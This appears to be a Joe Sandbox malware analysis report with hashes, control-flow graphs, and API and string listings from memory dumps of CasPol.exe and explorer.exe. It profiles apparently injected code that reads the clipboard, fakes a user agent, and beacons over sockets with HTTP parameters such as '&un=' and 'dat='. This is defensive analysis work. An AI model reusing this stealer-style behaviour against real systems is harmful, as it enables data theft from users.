                                                                • Opcode ID: 2ebe9fbea620b6e4bd59d04cfb691e29c2457523597f52fbf66df8e4d9747071
                                                                • Instruction ID: ba22ce99068caf5ed34afa89a05c33f7da10a7fcedf942b41aef759ebbbd204b
                                                                • Opcode Fuzzy Hash: 2ebe9fbea620b6e4bd59d04cfb691e29c2457523597f52fbf66df8e4d9747071
                                                                • Instruction Fuzzy Hash: FF9002E1201140925500A6998805B0B4609ABE0241B51C416E1045560CC5658851A175
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0166AD30 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97bae916f2294ba0f79cf4aeae623d68a87b51d266df2cdf665e65714622061f
                                                                • Instruction ID: d8711bc65aad8bbafb4edd42bfc9fb78270a05c3cd363902417aaeafd24a3c19
                                                                • Opcode Fuzzy Hash: 97bae916f2294ba0f79cf4aeae623d68a87b51d266df2cdf665e65714622061f
                                                                • Instruction Fuzzy Hash: 62900271A0500012A14075994C15647410ABBE0781B55C411A0505554CC9948A5563E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016695F0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d2c5f4bc6f0463aa7d0664f90156e6c1a6eee0f9d033c3b9d2a474e686b780a
                                                                • Instruction ID: ee32f15cf5019380e12c4f02fc1b004edbd94eef0059f1696ce34a8d36ed105e
                                                                • Opcode Fuzzy Hash: 9d2c5f4bc6f0463aa7d0664f90156e6c1a6eee0f9d033c3b9d2a474e686b780a
                                                                • Instruction Fuzzy Hash: E490027120100802E10465994C056870109ABD0341F51C411A6015655ED6A588917171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669760 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: afa9cd5a132163cb6892d9898eae0a92f49e2a5869be02b1827806dad6e04de2
                                                                • Instruction ID: e77730862b128e4a34311217fe11c4a612a0a485cf9e71d40ac4e4965fc7e587
                                                                • Opcode Fuzzy Hash: afa9cd5a132163cb6892d9898eae0a92f49e2a5869be02b1827806dad6e04de2
                                                                • Instruction Fuzzy Hash: 6C90027120100403E100659959097070109ABD0241F51D811A0415558DD69688517161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669770 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e1ff4bdfb3b90c048b36313c9a2dabf108cbbb3558a0bb6168db9173ceb647e
                                                                • Instruction ID: 085d2b9570adca5e25688942cf4448d428b977d034bcf4b5c73a25b6e458daa2
                                                                • Opcode Fuzzy Hash: 9e1ff4bdfb3b90c048b36313c9a2dabf108cbbb3558a0bb6168db9173ceb647e
                                                                • Instruction Fuzzy Hash: 1590026120504442E10069995809A070109ABD0245F51D411A1055595DC6758851B171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0166A770 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17088131aa908bc81fe215d86acafc7c0fca916b2be5c4b32d3f6f2830ee9dd5
                                                                • Instruction ID: c114e22093fd74b4ae79cce1f885ff0fcdd6b3280249401bf55a2e2b63cce0fe
                                                                • Opcode Fuzzy Hash: 17088131aa908bc81fe215d86acafc7c0fca916b2be5c4b32d3f6f2830ee9dd5
                                                                • Instruction Fuzzy Hash: 7A90027520504442E50069995C05A870109ABD0345F51D811A041559CDC6948861B161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669730 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 00f9cb5cc31f56163aa52d26c548cb9fa575ac8fc5a04b883242a65e45e54006
                                                                • Instruction ID: b490b46e5f5d9d7f310833fbec1908b9fbb0633e324dbed88ea8e2999e376ec2
                                                                • Opcode Fuzzy Hash: 00f9cb5cc31f56163aa52d26c548cb9fa575ac8fc5a04b883242a65e45e54006
                                                                • Instruction Fuzzy Hash: 0D90026160500402E140759958197070119ABD0241F51D411A0015554DC6998A5576E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0166A710 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5a83f4986ae6d6511357da09b197c21ff48805c82bd945c5086f3a20e1dd4d1
                                                                • Instruction ID: e57b976ab4f4ef2b0a6be5878db42f3be74a310ea63096c585dc2a8b168e9694
                                                                • Opcode Fuzzy Hash: b5a83f4986ae6d6511357da09b197c21ff48805c82bd945c5086f3a20e1dd4d1
                                                                • Instruction Fuzzy Hash: C090027130100052A500AAD95C05A4B4209ABF0341B51D415A4005554CC59488616161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669650 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f721eccfda34306c5e6292594fbc7de7dbcb19529371b5b4c464e517f68420d
                                                                • Instruction ID: 0ad80f112b7df9724f3b08705b77f7a52bf5bbcbf7c98c1b6b075c54cd83450e
                                                                • Opcode Fuzzy Hash: 6f721eccfda34306c5e6292594fbc7de7dbcb19529371b5b4c464e517f68420d
                                                                • Instruction Fuzzy Hash: 5790027120504842E14075994805A470119ABD0345F51C411A0055694DD6658D55B6A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669610 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14b609c75a196b6290d7048baf4e5a5feb41461b07b46fb8e70ab81ace8d721b
                                                                • Instruction ID: 94b61ec3c8350a3219c4bbbd6ea8dceb11987acde83098931b5769adef3699c9
                                                                • Opcode Fuzzy Hash: 14b609c75a196b6290d7048baf4e5a5feb41461b07b46fb8e70ab81ace8d721b
                                                                • Instruction Fuzzy Hash: 6D90027160500802E150759948157470109ABD0341F51C411A0015654DC7958A5576E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016696D0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50c165217588edee2cea44f3d6791ab56ad8b206accd39941aef220227cde3c3
                                                                • Instruction ID: 1dfa4d7e603cc2c87fdb0901613559873f9479dfa8c8bff5e9e98243c22651ad
                                                                • Opcode Fuzzy Hash: 50c165217588edee2cea44f3d6791ab56ad8b206accd39941aef220227cde3c3
                                                                • Instruction Fuzzy Hash: 8E90027120100842E10065994805B470109ABE0341F51C416A0115654DC655C8517561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction ID: 4ade4bddde16522380ddb09c9e631f1c301057152f5e53df303db9a7a9c501ce
                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction Fuzzy Hash:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016BFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 53%
                                                                			E016BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0166CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E016B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E016B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                0x016bfdda
                                                                0x016bfde2
                                                                0x016bfde5
                                                                0x016bfdec
                                                                0x016bfdfa
                                                                0x016bfdff
                                                                0x016bfe0a
                                                                0x016bfe0f
                                                                0x016bfe17
                                                                0x016bfe1e
                                                                0x016bfe19
                                                                0x016bfe19
                                                                0x016bfe19
                                                                0x016bfe20
                                                                0x016bfe21
                                                                0x016bfe22
                                                                0x016bfe25
                                                                0x016bfe40

                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016BFDFA
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016BFE01
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016BFE2B
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                • API String ID: 885266447-3903918235
                                                                • Opcode ID: a94b4ae3efa4aa942f7a996a221185dbeef3a545bd5e26f1d8bbdea9500b5b4d
                                                                • Instruction ID: f953a75abab84bd5648f5257beb2f420212c023a173cc5aea62bd82349f8ecad
                                                                • Opcode Fuzzy Hash: a94b4ae3efa4aa942f7a996a221185dbeef3a545bd5e26f1d8bbdea9500b5b4d
                                                                • Instruction Fuzzy Hash: 48F0C272200602BBE6211A45DC42EB3BB6AEB45B30F240218F628561E1DA62B87087E4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:5.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:20.5%
                                                                Total number of Nodes:83
                                                                Total number of Limit Nodes:12
                                                                execution_graph 8251 85d8ed9 8252 85d8f44 socket 8251->8252 8253 85d8f1c 8251->8253 8253->8252 8248 85d9078 8249 85d90ba 8248->8249 8250 85d90e2 connect 8248->8250 8249->8250 8166 85d62d6 8167 85d62f4 8166->8167 8174 85d7fb2 8167->8174 8171 85d6380 8172 85d6304 8172->8171 8184 85d44e2 8172->8184 8175 85d7ff7 8174->8175 8192 85d7e62 8175->8192 8177 85d813d 8196 85d8f72 8177->8196 8179 85d62fc 8180 85d43f2 8179->8180 8181 85d440b 8180->8181 8183 85d44a9 8180->8183 8203 85dc4f2 8181->8203 8183->8172 8185 85d4587 8184->8185 8186 85d44ff 8184->8186 8185->8172 8186->8185 8228 85d5e22 8186->8228 8188 85d4577 8232 85db4b2 8188->8232 8190 85d457f 8191 85d43f2 8 API calls 8190->8191 8191->8185 8193 85d7e8e 8192->8193 8199 85d7472 8193->8199 8195 85d7e9b 8195->8177 8197 85d8fad 8196->8197 8198 85d8fd5 WSAStartup 8196->8198 8197->8198 8198->8179 8201 85d74e4 8199->8201 8200 85d755f 8200->8195 8201->8200 8202 85d754e ObtainUserAgentString 8201->8202 8202->8200 8204 85dc525 8203->8204 8207 85dc5f1 8204->8207 8213 85dcb5d 8204->8213 8219 85d8ee2 8204->8219 8206 85dc6b7 8206->8213 8218 85dc73e 8206->8218 8222 85d9082 8206->8222 8207->8206 8209 85dc693 getaddrinfo 8207->8209 8207->8213 8209->8206 8211 85dcd2a 8212 85dcd4b SleepEx 8211->8212 8214 85dcd57 8211->8214 8212->8213 8213->8183 8214->8213 8215 85dcddc setsockopt recv 8214->8215 8215->8213 8216 85dce3f 8215->8216 8216->8213 8217 85dce48 recv 8216->8217 8217->8213 8217->8216 8218->8213 8225 85d8ff2 8218->8225 8220 85d8f1c 8219->8220 8221 85d8f44 socket 8219->8221 8220->8221 8221->8207 8223 85d90ba 8222->8223 8224 85d90e2 connect 8222->8224 8223->8224 8224->8218 8226 85d904f send 8225->8226 8227 85d9027 8225->8227 8226->8211 8227->8226 8229 85d5e3b 8228->8229 8231 85d5e7f 8228->8231 8230 85d5e77 OpenClipboard 8229->8230 8229->8231 8230->8231 8231->8188 8233 85db4e9 8232->8233 8234 85db578 8233->8234 8235 85dc4f2 8 API calls 8233->8235 8236 85db561 SleepEx 8233->8236 8234->8190 8234->8234 8235->8233 8236->8233 8259 85d8f66 8260 85d8f6f 8259->8260 8261 85d8fd5 WSAStartup 8260->8261 8254 85db4b1 8255 85db4e9 8254->8255 8256 85db578 8255->8256 8257 85dc4f2 8 API calls 8255->8257 8258 85db561 SleepEx 8255->8258 8257->8255 8258->8255 8237 85d4692 8238 85d46a9 8237->8238 8239 85d46f9 8238->8239 8240 85d46d3 CreateThread 8238->8240 8241 85d4592 8245 85d45b3 8241->8245 8242 85d4678 8243 85d45e2 SleepEx 8243->8243 8243->8245 8244 85d5e22 OpenClipboard 8244->8245 8245->8242 8245->8243 8245->8244 8246 85db4b2 9 API calls 8245->8246 8247 85d43f2 8 API calls 8245->8247 8246->8245 8247->8245

                                                                Executed Functions

                                                                Function 085DC4F2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 829networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 85dc4f2-85dc523 1 85dc525-85dc529 0->1 2 85dc543-85dc546 0->2 1->2 3 85dc52b-85dc52f 1->3 4 85dc54c-85dc552 2->4 5 85dcbc1-85dcbce 2->5 3->2 6 85dc531-85dc535 3->6 4->5 7 85dc558-85dc56c 4->7 6->2 8 85dc537-85dc53b 6->8 9 85dc56e-85dc572 7->9 10 85dc574-85dc575 7->10 8->2 11 85dc53d-85dc541 8->11 9->10 12 85dc57f-85dc588 9->12 10->12 11->2 11->4 13 85dc59f-85dc5a3 12->13 14 85dc58a-85dc58e 12->14 15 85dc5ab-85dc5d0 13->15 17 85dc5a5 13->17 14->15 16 85dc590-85dc59d 14->16 18 85dc5d8-85dc5ec call 85d8ee2 15->18 19 85dc5d2-85dc5d6 15->19 16->17 17->15 22 85dc5f1-85dc613 18->22 19->18 20 85dc619-85dc620 19->20 23 85dc6ca-85dc6da 20->23 24 85dc626-85dc62e 20->24 22->20 25 85dcbb1-85dcbba 22->25 23->25 26 85dc6e0-85dc6f0 23->26 27 85dc65e-85dc671 24->27 28 85dc630-85dc658 call 85d4012 call 85dbeb2 24->28 25->5 30 85dc70a-85dc71c 26->30 31 85dc6f2-85dc703 call 85d8e72 26->31 27->25 29 85dc677-85dc67d 27->29 28->27 29->25 33 85dc683-85dc685 29->33 35 85dc77e-85dc7a3 30->35 36 85dc71e-85dc739 call 85d9082 30->36 31->30 33->25 40 85dc68b-85dc68d 33->40 38 85dc7a5-85dc7c0 call 85dd332 35->38 39 85dc7c2-85dc7c6 35->39 48 85dc73e-85dc766 36->48 56 85dc80a call 85dd332 38->56 46 85dc7cc-85dc7d0 39->46 47 85dcba1-85dcba2 39->47 40->25 45 85dc693-85dc6b5 getaddrinfo 40->45 45->23 51 85dc6b7-85dc6bf 45->51 46->47 52 85dc7d6-85dc7da 46->52 53 85dcba9-85dcbaa 47->53 48->35 54 85dc768-85dc774 48->54 51->23 57 85dc7dc-85dc7e0 52->57 58 85dc7e2-85dc808 call 85dd332 52->58 53->25 54->53 55 85dc77a 54->55 55->35 59 85dc80f-85dc8bf call 85dd302 call 85da3a2 call 85da392 * 2 call 85dd302 call 85d97d2 call 85dd522 56->59 57->58 57->59 58->56 77 85dc8c1-85dc8c5 59->77 78 85dc8d3-85dc933 call 85dd332 59->78 77->78 80 85dc8c7-85dc8ce call 85d9cd2 77->80 83 85dc939-85dc975 call 85dd302 call 85dd7b2 call 85dd522 78->83 84 85dca26-85dcb13 call 85dd302 call 85dd7b2 * 4 call 85dd522 * 2 call 85da392 * 2 78->84 80->78 98 85dc99a-85dc9c8 call 85dd7b2 * 2 83->98 99 85dc977-85dc996 call 85dd7b2 call 85dd522 83->99 117 85dcb18-85dcb3c call 85dd7b2 84->117 112 85dc9ca-85dc9ef call 85dd522 call 85dd7b2 98->112 113 85dc9f4-85dc9f8 98->113 99->98 112->113 116 85dc9fe-85dca21 call 85dd7b2 113->116 113->117 116->117 126 85dcbcf-85dccab call 85dd7b2 * 7 call 85dd522 call 85dd302 call 85dd522 call 85d97d2 call 85d9cd2 117->126 127 85dcb42-85dcb57 call 85dd7b2 call 85dd522 117->127 141 85dcb5d-85dcb9a call 85d8d12 call 85d9112 126->141 188 85dccb1-85dccb8 126->188 127->141 142 85dcd00-85dcd2c call 85d8ff2 127->142 141->47 149 85dcd2e-85dcd43 142->149 150 85dcd57-85dcd5b 142->150 149->150 153 85dcd45-85dcd49 149->153 154 85dcd5d-85dcd61 150->154 155 85dcd6f-85dcd83 150->155 153->150 158 85dcd4b-85dcd52 SleepEx 153->158 159 85dce97-85dced3 call 85d9112 154->159 160 85dcd67-85dcd69 154->160 161 85dcd85-85dcd9b 155->161 162 85dcda1-85dce3d call 85dd332 call 85dd302 setsockopt recv 155->162 158->159 159->47 160->155 160->159 161->159 161->162 175 85dce3f 162->175 176 85dce80-85dce8d 162->176 175->176 178 85dce41-85dce46 175->178 176->159 178->176 180 85dce48-85dce7e recv 178->180 180->175 180->176 189 85dccba-85dccc1 188->189 190 85dcce2-85dcced 188->190 191 85dccd9-85dcce0 189->191 192 85dccc3-85dcccf 189->192 190->142 193 85dccef-85dccfa 190->193 191->190 194 85dccfc-85dccfd 191->194 192->191 193->142 194->142
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: recv$Sleepgetaddrinfosetsockopt
                                                                • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                                • API String ID: 878647675-2045366144
                                                                • Opcode ID: 2fc16e85ac3816d950710393f1d4933702210f777e9550580e5846ffcb64c173
                                                                • Instruction ID: dbd50078a95ef33f8edbd6cba86490b10e81dacee33d73efa25b4446f0f7b3ec
                                                                • Opcode Fuzzy Hash: 2fc16e85ac3816d950710393f1d4933702210f777e9550580e5846ffcb64c173
                                                                • Instruction Fuzzy Hash: 66527175218B088BDB79EF2CD484BEAB7E1FB94306F54452DD89BC7242DE30A946CB41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D5E22 Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 317 85d5e22-85d5e35 318 85d5e3b-85d5e43 317->318 319 85d5ec4-85d5ec9 317->319 318->319 320 85d5e45-85d5e4d 318->320 320->319 321 85d5e4f-85d5e57 320->321 321->319 322 85d5e59-85d5e61 321->322 322->319 323 85d5e63-85d5e6b 322->323 323->319 324 85d5e6d-85d5e75 323->324 324->319 325 85d5e77-85d5e7d OpenClipboard 324->325 325->319 326 85d5e7f-85d5e95 325->326 328 85d5eb9-85d5ec0 326->328 329 85d5e97-85d5ea3 326->329 328->319 329->328 332 85d5ea5-85d5eb1 call 85d5c02 329->332 332->328
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: ClipboardOpen
                                                                • String ID:
                                                                • API String ID: 2793039342-0
                                                                • Opcode ID: 973df683495c9b69cc4f22e00b491ac9707cdee606476c2557e59d26ce09cb4c
                                                                • Instruction ID: 375f3359d7b266fd5e5523325b9f5bd9725b2b22e68f3e9e0058aa907259f797
                                                                • Opcode Fuzzy Hash: 973df683495c9b69cc4f22e00b491ac9707cdee606476c2557e59d26ce09cb4c
                                                                • Instruction Fuzzy Hash: 9D110C30110B0A8FEB65BB2C808E7B562A5FB88207F5805FD9D0ACF1D5EB76C986C710
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D7472 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,085D7E9B), ref: 085D7559
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: AgentObtainStringUser
                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                • API String ID: 2681117516-1987325725
                                                                • Opcode ID: d39db5116cbb94e920403d79280b132d67c6a1c700a78bc228144ed42e862d9f
                                                                • Instruction ID: e8b4bc31620d76072e5ab4b99e2a192ee104c5e786da324faf51c2e49b315727
                                                                • Opcode Fuzzy Hash: d39db5116cbb94e920403d79280b132d67c6a1c700a78bc228144ed42e862d9f
                                                                • Instruction Fuzzy Hash: 5F31A135A14B4D8BCF15EFA8C4846ED7BE1FB98206F40026AD84ED7240EE7486498795
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D9078 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 215 85d9078-85d90b8 216 85d90ba-85d90dc call 85dbeb2 215->216 217 85d90e2-85d9105 connect 215->217 216->217
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: connect
                                                                • String ID: conn$ect
                                                                • API String ID: 1959786783-716201944
                                                                • Opcode ID: 2f1f238a26762bc532f6605c9fb5e3d2dc556284b7df9b3f133164816aab584b
                                                                • Instruction ID: eb420bd857e5b61b2b5fefa395c8e063a7d6f9485e3d6a97f4cdfe30b3d53298
                                                                • Opcode Fuzzy Hash: 2f1f238a26762bc532f6605c9fb5e3d2dc556284b7df9b3f133164816aab584b
                                                                • Instruction Fuzzy Hash: DC01963051C7088FCB94EF1CD088B54B7D1FB98321F1540BDD94ECB266CAB48885C781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D9082 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 220 85d9082-85d90b8 221 85d90ba-85d90dc call 85dbeb2 220->221 222 85d90e2-85d9105 connect 220->222 221->222
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: connect
                                                                • String ID: conn$ect
                                                                • API String ID: 1959786783-716201944
                                                                • Opcode ID: cdaf3b3c2e97a94ca456cc6e6ea0da62bcb1465e9dcd869cdceb4a5bda98711c
                                                                • Instruction ID: 29ba8c3698b847d36bb7c7b5e749028def7feaef9993417965e78a0c79f5b083
                                                                • Opcode Fuzzy Hash: cdaf3b3c2e97a94ca456cc6e6ea0da62bcb1465e9dcd869cdceb4a5bda98711c
                                                                • Instruction Fuzzy Hash: DD011270518A088FCB94EF5CD088B5577E0FB98321F1581BEA94DCB266CA74C985CBC1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D8F66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 225 85d8f66-85d8f6d 226 85d8f6f-85d8f83 225->226 227 85d8f87-85d8fab 225->227 226->227 228 85d8fad-85d8fcf call 85dbeb2 227->228 229 85d8fd5-85d8ff0 WSAStartup 227->229 228->229
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID: WSAS$tart
                                                                • API String ID: 724789610-2426239465
                                                                • Opcode ID: 16461cc60b29d8018f9e38de3f094586ee10a68b833ed0071c2d0660bf92ce1e
                                                                • Instruction ID: 7e3237e3a456ec6c01ba1c7ef0779e0103817d47350b71d659364bf48474dd8e
                                                                • Opcode Fuzzy Hash: 16461cc60b29d8018f9e38de3f094586ee10a68b833ed0071c2d0660bf92ce1e
                                                                • Instruction Fuzzy Hash: 2601A1705086888FCB44EF18D048769BBE0FB44352F1541AED549CF266C7B48985CB96
                                                                Uniqueness

